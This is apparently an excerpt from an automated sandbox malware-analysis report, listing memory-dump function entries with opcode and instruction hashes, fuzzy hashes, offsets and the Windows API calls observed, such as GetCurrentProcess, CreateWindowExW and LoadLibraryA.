                                                                                                                                                                  • Opcode ID: 368c517d6bfea9772f9a62a5cfed35f9d84f6c3cb0f838c43550bba2e00c6be4
                                                                                                                                                                  • Instruction ID: acf494c139b6dae6eca73e9af69648969a780ac9dfa28050974450a0e353eef7
                                                                                                                                                                  • Opcode Fuzzy Hash: 368c517d6bfea9772f9a62a5cfed35f9d84f6c3cb0f838c43550bba2e00c6be4
                                                                                                                                                                  • Instruction Fuzzy Hash: B5B1ED74E1521ADFCB44DFA5D880ADDBBB2FF88310F608929D519AB354DB30A946CF90
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.285037104.00000000019A0000.00000040.00000001.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: H"NWy~L
                                                                                                                                                                  • API String ID: 0-3861034684
                                                                                                                                                                  • Opcode ID: 68d95603a578506ded4a4a4e1ac7a6b428dac96b1956faa74c166cce1a0626d3
                                                                                                                                                                  • Instruction ID: 21db315cd3024106cfc2d9c86b6030ed6415f0d286612369cd4cea04c81b8895
                                                                                                                                                                  • Opcode Fuzzy Hash: 68d95603a578506ded4a4a4e1ac7a6b428dac96b1956faa74c166cce1a0626d3
                                                                                                                                                                  • Instruction Fuzzy Hash: 64610474E05209CFDB04CFA9D5809EEFBF2EF89210F69942AD409B7254D3309A46CFA4
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.285037104.00000000019A0000.00000040.00000001.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: W<k
                                                                                                                                                                  • API String ID: 0-260918285
                                                                                                                                                                  • Opcode ID: c4d202221a4d50f0f91fb70e8086c77ab7a450bbdcdf52890e67a8621075b03a
                                                                                                                                                                  • Instruction ID: 23c3d0de7ac08df37a66a3235bdad4fa6aabb15b3b7ca3f763162b128df29487
                                                                                                                                                                  • Opcode Fuzzy Hash: c4d202221a4d50f0f91fb70e8086c77ab7a450bbdcdf52890e67a8621075b03a
                                                                                                                                                                  • Instruction Fuzzy Hash: 894104B4E0420ACFDB84CFAAC4815AEFBF2FF99210F54C46AD519E7215D3349A458FA1
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.285037104.00000000019A0000.00000040.00000001.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: W<k
                                                                                                                                                                  • API String ID: 0-260918285
                                                                                                                                                                  • Opcode ID: 4088c3b601a39137d7198054329f1eede8f047ea435c7367bb20d0a1f633049c
                                                                                                                                                                  • Instruction ID: 4af95e3dd2481486ed6e4762ae856881d4b8e8e4810db756943c3082157d6cd6
                                                                                                                                                                  • Opcode Fuzzy Hash: 4088c3b601a39137d7198054329f1eede8f047ea435c7367bb20d0a1f633049c
                                                                                                                                                                  • Instruction Fuzzy Hash: E841E5B4E0420ACFDB84CFAAC4815AEFBF2FF88210F65C42AD519B7214D7349A458F94
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.291607749.00000000058C0000.00000040.00000001.sdmp, Offset: 058C0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 1e86b3ef39556f508cfa77f70656f5562afd666c459e6186730646fe020e492f
                                                                                                                                                                  • Instruction ID: 3caefb939d9ac63a65d855f949e032489bcfe9e30f6d9b80e7b56ba66e922191
                                                                                                                                                                  • Opcode Fuzzy Hash: 1e86b3ef39556f508cfa77f70656f5562afd666c459e6186730646fe020e492f
                                                                                                                                                                  • Instruction Fuzzy Hash: 7512E8F14137668BF312EF65F8C86893B69B746329F914208D2621FAD8D7B4116ACF44
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.291607749.00000000058C0000.00000040.00000001.sdmp, Offset: 058C0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 2ef21526671e4293083eec573ac3a872b0fe9df0a8b6dbc1f7a206fcc31471bb
                                                                                                                                                                  • Instruction ID: bbfabf4be50f853940290f35a9c27fc3640bcd5f14549b1d05a05cd992fe29e2
                                                                                                                                                                  • Opcode Fuzzy Hash: 2ef21526671e4293083eec573ac3a872b0fe9df0a8b6dbc1f7a206fcc31471bb
                                                                                                                                                                  • Instruction Fuzzy Hash: 7DA15D32E002198FCF05DFB9D88459DBBB2FF85300B1585AAE916EB221EB35ED55CB40
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.291607749.00000000058C0000.00000040.00000001.sdmp, Offset: 058C0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: ab1f3029ccc449256933c7e95d360d690d3d03002a0596a7dbcfcfef6f2434d2
                                                                                                                                                                  • Instruction ID: c48731b427838b391731da349327e07226a906c2716c79fa5e9b2ea633872f4f
                                                                                                                                                                  • Opcode Fuzzy Hash: ab1f3029ccc449256933c7e95d360d690d3d03002a0596a7dbcfcfef6f2434d2
                                                                                                                                                                  • Instruction Fuzzy Hash: E5C13BB18137668BF311EF65F8C82893B79BB86328F514309D2626F6D8D7B4116ACF44
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.285037104.00000000019A0000.00000040.00000001.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 5047b4007d441d2c750a172aa38d5323c9c77d9d2b3d3f05a076101d91ea74fa
                                                                                                                                                                  • Instruction ID: 3ba94aa08b4aba5cf168ee6f28a2b9bbbe815396c68005ceb2088b580e263f6f
                                                                                                                                                                  • Opcode Fuzzy Hash: 5047b4007d441d2c750a172aa38d5323c9c77d9d2b3d3f05a076101d91ea74fa
                                                                                                                                                                  • Instruction Fuzzy Hash: 0681E274E11219DFCB44CF99C98499EBBF1FF98310F18955AD419AB220D370AA45CF91
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.285037104.00000000019A0000.00000040.00000001.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: ceba69f1524d07e5dece53efb89a2675bf71fa17b864e6db646a650d5ac2bcb6
                                                                                                                                                                  • Instruction ID: f506050198a6f641260a7cb5ef014aa4fa974f8f74918def6fd671b3ed28cd62
                                                                                                                                                                  • Opcode Fuzzy Hash: ceba69f1524d07e5dece53efb89a2675bf71fa17b864e6db646a650d5ac2bcb6
                                                                                                                                                                  • Instruction Fuzzy Hash: CC81E374E11219CFCB44CFA9C98499EBBF1FF99310F18856AD419AB320D370AA46CF91
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.285037104.00000000019A0000.00000040.00000001.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 66b35db07f3b38d4c0c584aa7cd275fc5da2cf17740cf1f967f5d87608984266
                                                                                                                                                                  • Instruction ID: 9716efb32d85667933b16b271a38d1f087cce8ed983b003807bb91af69045927
                                                                                                                                                                  • Opcode Fuzzy Hash: 66b35db07f3b38d4c0c584aa7cd275fc5da2cf17740cf1f967f5d87608984266
                                                                                                                                                                  • Instruction Fuzzy Hash: D16158B1E0421ADFDB04CFA5C8819AEFBB1FF89300F55856AD519BB210D774AA46CF90
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.285037104.00000000019A0000.00000040.00000001.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 4c41f9ae9d44e2ce96bbcb7c5f3ce07cfabbe3326d6c27017706b56ec4305a5b
                                                                                                                                                                  • Instruction ID: 9ebdecb91571eb076b03c6cf649bef41a4478dc18322c11e38be982a9099df12
                                                                                                                                                                  • Opcode Fuzzy Hash: 4c41f9ae9d44e2ce96bbcb7c5f3ce07cfabbe3326d6c27017706b56ec4305a5b
                                                                                                                                                                  • Instruction Fuzzy Hash: 5B510670E152198FDB54CFA9D944A9EFBB6FF88310F1081A9D909A7364DB309A458F50
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.285037104.00000000019A0000.00000040.00000001.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: f5e989d6ba9b48ee348126cbb9c6137573a3cc00f5d52b7351f70efc77784f63
                                                                                                                                                                  • Instruction ID: 338ed7da0dd2b4c589404bf970d09d0034c721cd8a3b81fb0037b2e1612c457a
                                                                                                                                                                  • Opcode Fuzzy Hash: f5e989d6ba9b48ee348126cbb9c6137573a3cc00f5d52b7351f70efc77784f63
                                                                                                                                                                  • Instruction Fuzzy Hash: F85138B0E152198FDB14CF6AD944A9EBBF6BF89300F14C1AAD408AB365D7309E45CF51
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.285037104.00000000019A0000.00000040.00000001.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: ac4ff3ee80414cc44ff2a602a130dcb6339ab00007f8d65a506bf2ed57111dbd
                                                                                                                                                                  • Instruction ID: 8fd9b455527dfd945389dc5f95c17d8336ede56207d64cb272cc8e5e849f559a
                                                                                                                                                                  • Opcode Fuzzy Hash: ac4ff3ee80414cc44ff2a602a130dcb6339ab00007f8d65a506bf2ed57111dbd
                                                                                                                                                                  • Instruction Fuzzy Hash: CF4115B0E0520ADFDB49CFA9C5815AEFBF2FF89210F65C46AC409AB214D3349A45CB95
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.285037104.00000000019A0000.00000040.00000001.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: b8827885099e9608df9b66d24aaf67a1c3017b96456b1d4836bd3a71dc616e31
                                                                                                                                                                  • Instruction ID: a67fab4297a11b52e508dfdb3f7424ea8b13ad39ee52c4bae2019a8bfba5c1d0
                                                                                                                                                                  • Opcode Fuzzy Hash: b8827885099e9608df9b66d24aaf67a1c3017b96456b1d4836bd3a71dc616e31
                                                                                                                                                                  • Instruction Fuzzy Hash: BB4105B0E0520ACFDB08CFAAC5815AEFBB2FF88200F65C46AC419A7214D3349A45CB95
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.285037104.00000000019A0000.00000040.00000001.sdmp, Offset: 019A0000, based on PE: false
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f988ef5f98e7fbf4b639ffac19dd2680ce314761650bc780329937e667e7cac8
• Instruction ID: 560f3bbf4149727c1634d85f1707ce3cb7fffc4052b4b6722483647da703df64
• Opcode Fuzzy Hash: f988ef5f98e7fbf4b639ffac19dd2680ce314761650bc780329937e667e7cac8
• Instruction Fuzzy Hash: 37416971E156588FEB28CF6B8D45699FBF3AFC9300F14C1BA850CA6225DB300A868F51
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.291607749.00000000058C0000.00000040.00000001.sdmp, Offset: 058C0000, based on PE: false
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f9e865361c3663194cce2325bbc95958e451358812a6203ee4d574b5b1f38a74
• Instruction ID: b2ff25cb4d20f368fe4faab0d0c7ecdc89e2da178f21d67729ee1883635a6fd0
• Opcode Fuzzy Hash: f9e865361c3663194cce2325bbc95958e451358812a6203ee4d574b5b1f38a74
• Instruction Fuzzy Hash: 5841EEB4D05248DFCB10CFA9E984ADDBBF4BF49310F14806AE809BB210D335A959CFA4
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.291607749.00000000058C0000.00000040.00000001.sdmp, Offset: 058C0000, based on PE: false
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1be37866486bac6cb9bb65339c9a34748450bd804bf997a76bccca4cb9491caf
• Instruction ID: e1599687a57886d79db465093d95f680db8438c016af0b918ae043a020ac16b4
• Opcode Fuzzy Hash: 1be37866486bac6cb9bb65339c9a34748450bd804bf997a76bccca4cb9491caf
• Instruction Fuzzy Hash: 4D31AAB4D052089FCB10CF99D584AEEFBF5BB49310F14906AE915B7310D374A945CF94
Uniqueness
Uniqueness Score: -1.00%

Executed Functions

APIs
• GetCurrentProcess.KERNEL32 ref: 0605E6D8
• GetCurrentThread.KERNEL32 ref: 0605E715
• GetCurrentProcess.KERNEL32 ref: 0605E752
• GetCurrentThreadId.KERNEL32 ref: 0605E7AB
Strings
Memory Dump Source
• Source File: 00000007.00000002.527866011.0000000006050000.00000040.00000001.sdmp, Offset: 06050000, based on PE: false
Similarity
• API ID: Current$ProcessThread
• String ID: slXO
• API String ID: 2063062207-2365745527
• Opcode ID: 6d51646afb2f2f37a241e22c13440192e267ca30f5584264516162fb9f9e0ca4
• Instruction ID: 3e5a9ef075a8ed5573850b731a18802e44e7d079d03efe1280264fc15930b67c
• Opcode Fuzzy Hash: 6d51646afb2f2f37a241e22c13440192e267ca30f5584264516162fb9f9e0ca4
• Instruction Fuzzy Hash: EB5184B49002498FDB40CFAACA887DEBFF5AF48314F24886AE409B7350D7345985CB61
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetCurrentProcess.KERNEL32 ref: 0605E6D8
• GetCurrentThread.KERNEL32 ref: 0605E715
• GetCurrentProcess.KERNEL32 ref: 0605E752
• GetCurrentThreadId.KERNEL32 ref: 0605E7AB
Strings
Memory Dump Source
• Source File: 00000007.00000002.527866011.0000000006050000.00000040.00000001.sdmp, Offset: 06050000, based on PE: false
Similarity
• API ID: Current$ProcessThread
• String ID: slXO
• API String ID: 2063062207-2365745527
• Opcode ID: 4a0a512914cdc462a82f3b4d3e2262cff1cbba0bc9376c3a230308c2ba277946
• Instruction ID: bd20da4f31ba465def18db0f5f0dcfbd6a2d99026710136f53c0462d1a530f94
• Opcode Fuzzy Hash: 4a0a512914cdc462a82f3b4d3e2262cff1cbba0bc9376c3a230308c2ba277946
• Instruction Fuzzy Hash: 5F5164B49006098FDB50CFAADA88BDEBBF5BF48314F24886AE419B3350D7745984CF65
Uniqueness
Uniqueness Score: -1.00%

APIs
• CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0605CDCA
Strings
Memory Dump Source
• Source File: 00000007.00000002.527866011.0000000006050000.00000040.00000001.sdmp, Offset: 06050000, based on PE: false
Similarity
• API ID: CreateWindow
• String ID: slXO$slXO
• API String ID: 716092398-3729817228
• Opcode ID: bd8a67a021d26ae098d35e611910b91b97726cafbdb2969ee35f8dc60d4de884
• Instruction ID: 037b6673139c6fb82a442973e6ada38cece7673a03990e74e99c4c32b621ae57
• Opcode Fuzzy Hash: bd8a67a021d26ae098d35e611910b91b97726cafbdb2969ee35f8dc60d4de884
• Instruction Fuzzy Hash: E151EFB5D003099FDB14CFA9C980ADEBFB5BF48310F25852AE819AB210D7749896CF90
Uniqueness
Uniqueness Score: -1.00%

APIs
• CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0605CDCA
Strings
Memory Dump Source
• Source File: 00000007.00000002.527866011.0000000006050000.00000040.00000001.sdmp, Offset: 06050000, based on PE: false
Similarity
• API ID: CreateWindow
• String ID: slXO$slXO
• API String ID: 716092398-3729817228
• Opcode ID: 649af2d752740e13df9e7be6ddab2c9e8f0b0b82f51d3ed163f6a17e1b39e91e
• Instruction ID: 16a0711df4fade08d7e65c627a6bf0ce4921080c6e46cfcba2acb2937bb0f483
• Opcode Fuzzy Hash: 649af2d752740e13df9e7be6ddab2c9e8f0b0b82f51d3ed163f6a17e1b39e91e
• Instruction Fuzzy Hash: A851BDB5D003099FDB14CF99C884ADEBFB5BF48314F25852AE819AB210D774A895CF90
Uniqueness
Uniqueness Score: -1.00%

APIs
• LoadLibraryA.KERNELBASE(?), ref: 06051C47
Strings
Memory Dump Source
• Source File: 00000007.00000002.527866011.0000000006050000.00000040.00000001.sdmp, Offset: 06050000, based on PE: false
Similarity
• API ID: LibraryLoad
• String ID: slXO$slXO
• API String ID: 1029625771-3729817228
• Opcode ID: 9512125f30a54aa55381437b2de7d25a1e14ea4a55a8d90f7f0f4aed3190d327
• Instruction ID: 39e53aafe5b5a9de4f0eda1e0141eb8b5445df00308e595f731c1b981833372c
• Opcode Fuzzy Hash: 9512125f30a54aa55381437b2de7d25a1e14ea4a55a8d90f7f0f4aed3190d327
• Instruction Fuzzy Hash: AB4122B0D006598FDB50CFA9C884B9EBFF1FB48314F15896AD815AB380D7B59886CB91
Uniqueness
Uniqueness Score: -1.00%

APIs
• CallWindowProcW.USER32(?,?,?,?,?), ref: 0605F849
Strings
Memory Dump Source
• Source File: 00000007.00000002.527866011.0000000006050000.00000040.00000001.sdmp, Offset: 06050000, based on PE: false
Similarity
• API ID: CallProcWindow
• String ID: slXO
• API String ID: 2714655100-2365745527
• Opcode ID: 93aa68de55f3ef152476db4815addc200177fa32e572ec0c9964c506977bce63
• Instruction ID: f542e71f0075564fdb872c2e0a11d2fce547f4af69b59708fc52b48dff7dc919
• Opcode Fuzzy Hash: 93aa68de55f3ef152476db4815addc200177fa32e572ec0c9964c506977bce63
• Instruction Fuzzy Hash: 3B4128B4900709CFDB50CF99C488AABBBF5FB88314F258859D919A7321C774A841CFA1
Uniqueness
Uniqueness Score: -1.00%

APIs
• EnumResourceNamesW.KERNELBASE(?,?,00000000,?,?,?,?,?,01696A4E,00000000,00000000), ref: 01696AE0
Strings
Memory Dump Source
• Source File: 00000007.00000002.523023519.0000000001690000.00000040.00000001.sdmp, Offset: 01690000, based on PE: false
Similarity
• API ID: EnumNamesResource
• String ID: slXO
• API String ID: 3334572018-2365745527
• Opcode ID: f52da841c7d53f211219bd76674d1690067a5cdee72c37880f46c61c145b453d
• Instruction ID: 9bebdfa272f090e0f126eb3b38daf73aea97dc6db497b76c3c6b5b7402849dee
• Opcode Fuzzy Hash: f52da841c7d53f211219bd76674d1690067a5cdee72c37880f46c61c145b453d
• Instruction Fuzzy Hash: 18218D719003099FDB10CF99C844BEFBBF9FB48324F148429E918A7350D778A941CBA1
Uniqueness
Uniqueness Score: -1.00%

APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0605E866,?,?,?,?,?), ref: 0605E927
Strings
Memory Dump Source
• Source File: 00000007.00000002.527866011.0000000006050000.00000040.00000001.sdmp, Offset: 06050000, based on PE: false
Similarity
• API ID: DuplicateHandle
• String ID: slXO
• API String ID: 3793708945-2365745527
• Opcode ID: 98aeb5f242f55ab0a18bfb754812ef2fc071a092120405c838873202d31911ab
• Instruction ID: 7b5882f5157928d85c205dd600183f58d664931bee419e5ec536c094d678fe63
• Opcode Fuzzy Hash: 98aeb5f242f55ab0a18bfb754812ef2fc071a092120405c838873202d31911ab
• Instruction Fuzzy Hash: DA21E4B59002099FDB50CFA9D884ADEBBF8FB48324F14842AE954A3310D374AA55CFA1
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • EnumResourceNamesW.KERNELBASE(?,?,00000000,?,?,?,?,?,01696A4E,00000000,00000000), ref: 01696AE0
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.523023519.0000000001690000.00000040.00000001.sdmp, Offset: 01690000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: EnumNamesResource
                                                                                                                                                                  • String ID: slXO
                                                                                                                                                                  • API String ID: 3334572018-2365745527
                                                                                                                                                                  • Opcode ID: 8b635b6f60ead41a01ec43ad6f34b6543636c5fc3c0f2460040bce6da376e2b1
                                                                                                                                                                  • Instruction ID: 935c20a5e2f8fb5c4714ded7d2379bbd1746ae2921f30e116e661f3b0eee35fe
                                                                                                                                                                  • Opcode Fuzzy Hash: 8b635b6f60ead41a01ec43ad6f34b6543636c5fc3c0f2460040bce6da376e2b1
                                                                                                                                                                  • Instruction Fuzzy Hash: 6A216A719003099FDB14CF9AC844BEEBBF9FB88324F148429E919A7340D778A945CFA1
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • EnumResourceNamesW.KERNELBASE(?,?,00000000,?,?,?,?,?,01696A4E,00000000,00000000), ref: 01696AE0
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.523023519.0000000001690000.00000040.00000001.sdmp, Offset: 01690000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: EnumNamesResource
                                                                                                                                                                  • String ID: slXO
                                                                                                                                                                  • API String ID: 3334572018-2365745527
                                                                                                                                                                  • Opcode ID: 553bd484402fc461b5bb32a9f1db36aa2d5dfdcdbd8fc5c15f34b0676e221216
                                                                                                                                                                  • Instruction ID: c6af1bb0daa7acf3b95542b46fdecfe474fbd1367b3368cc8c0e442e7329d01d
                                                                                                                                                                  • Opcode Fuzzy Hash: 553bd484402fc461b5bb32a9f1db36aa2d5dfdcdbd8fc5c15f34b0676e221216
                                                                                                                                                                  • Instruction Fuzzy Hash: 9B215C719002098FDB14CF9AC844BEEBBF9FF88324F148429D959A7350D778A985CFA1
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • EnumResourceTypesW.KERNEL32(?,00000000,?), ref: 01696910
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.523023519.0000000001690000.00000040.00000001.sdmp, Offset: 01690000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: EnumResourceTypes
                                                                                                                                                                  • String ID: slXO
                                                                                                                                                                  • API String ID: 29811550-2365745527
                                                                                                                                                                  • Opcode ID: 3dfc7cd586b945bdffa4093d5de7a3066745f68c49f4a6c15a8865163282af07
                                                                                                                                                                  • Instruction ID: d3b4262438c2fb304ceb60af845f38f01d9be443a67d9ecb0524ce04afe577cb
                                                                                                                                                                  • Opcode Fuzzy Hash: 3dfc7cd586b945bdffa4093d5de7a3066745f68c49f4a6c15a8865163282af07
                                                                                                                                                                  • Instruction Fuzzy Hash: 7E2136B19002098FDB14DF99C844BEEBBF9EF88324F14842AD914A7350C774A985CFA1
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • EnumResourceTypesW.KERNEL32(?,00000000,?), ref: 01696910
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.523023519.0000000001690000.00000040.00000001.sdmp, Offset: 01690000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: EnumResourceTypes
                                                                                                                                                                  • String ID: slXO
                                                                                                                                                                  • API String ID: 29811550-2365745527
                                                                                                                                                                  • Opcode ID: 92de6d0da4d9bedf19d1f63fdd8904aef76d78f806d4e42bcc43d2469bef2d18
                                                                                                                                                                  • Instruction ID: d55ad25d7e1589701be622389b5a52ffa2042cc0887f8d2e071c587fb8cf5135
                                                                                                                                                                  • Opcode Fuzzy Hash: 92de6d0da4d9bedf19d1f63fdd8904aef76d78f806d4e42bcc43d2469bef2d18
                                                                                                                                                                  • Instruction Fuzzy Hash: DD2125B1D002098FDB14CFA9C844BEEFBF9EB88324F14842AD515A3250DB74A955CFA1
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.522610508.000000000161D000.00000040.00000001.sdmp, Offset: 0161D000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: c808a03b22139f9c068887cb34f06646ad411ee6743f5b91aa212c2d62de3568
                                                                                                                                                                  • Instruction ID: 4f8d9b67528c3bfd52e1a23d3f8a646de10b367e19818601178ef6a08ad85cea
                                                                                                                                                                  • Opcode Fuzzy Hash: c808a03b22139f9c068887cb34f06646ad411ee6743f5b91aa212c2d62de3568
                                                                                                                                                                  • Instruction Fuzzy Hash: 7B210AB1504244EFDB05DF94DDC4B26BF66FB88328F28C969E9050B34AC336D456C7A1
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.522765274.000000000163D000.00000040.00000001.sdmp, Offset: 0163D000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: bc6b508178a7f45273f5c2d8fed1443c1359ac0e0e397d77a3057420a3027337
                                                                                                                                                                  • Instruction ID: 99c135e75e597e4a149e59b374899829d7d9ef718b7daaf61bc936947ca5ae8e
                                                                                                                                                                  • Opcode Fuzzy Hash: bc6b508178a7f45273f5c2d8fed1443c1359ac0e0e397d77a3057420a3027337
                                                                                                                                                                  • Instruction Fuzzy Hash: 8B21F6B5504244EFDB01DF94DCC0B1ABB65FBC4325F64C969E8090B346C336D456CBA1
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.522765274.000000000163D000.00000040.00000001.sdmp, Offset: 0163D000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 6365d5ba40cb7ebaad857e325b3b41daec34cbbc510b8131c998d0f895b54e87
                                                                                                                                                                  • Instruction ID: 5d6234ef353a0884cf876e475442da762d561942b370f230669e88e402672f23
                                                                                                                                                                  • Opcode Fuzzy Hash: 6365d5ba40cb7ebaad857e325b3b41daec34cbbc510b8131c998d0f895b54e87
                                                                                                                                                                  • Instruction Fuzzy Hash: 8521F271504204EFDB05CF94D9C0B26BBA5FBC4328F64C9A9EA494B346C736D856CB61
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.522765274.000000000163D000.00000040.00000001.sdmp, Offset: 0163D000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: bab327966ba48b3b85d7355df218dfe02124122b1f0b0357edaa6cccd6ca2421
                                                                                                                                                                  • Instruction ID: a7b0798641187a7ff73d4000c2b98103efb60ec254335ea2050e36288e51dff4
                                                                                                                                                                  • Opcode Fuzzy Hash: bab327966ba48b3b85d7355df218dfe02124122b1f0b0357edaa6cccd6ca2421
                                                                                                                                                                  • Instruction Fuzzy Hash: DB212371504244DFDB11DFA4DDC0B2AFBA9FBC4B64F608969D80A0B346C336E847C6A2
                                                                                                                                                                  Uniqueness

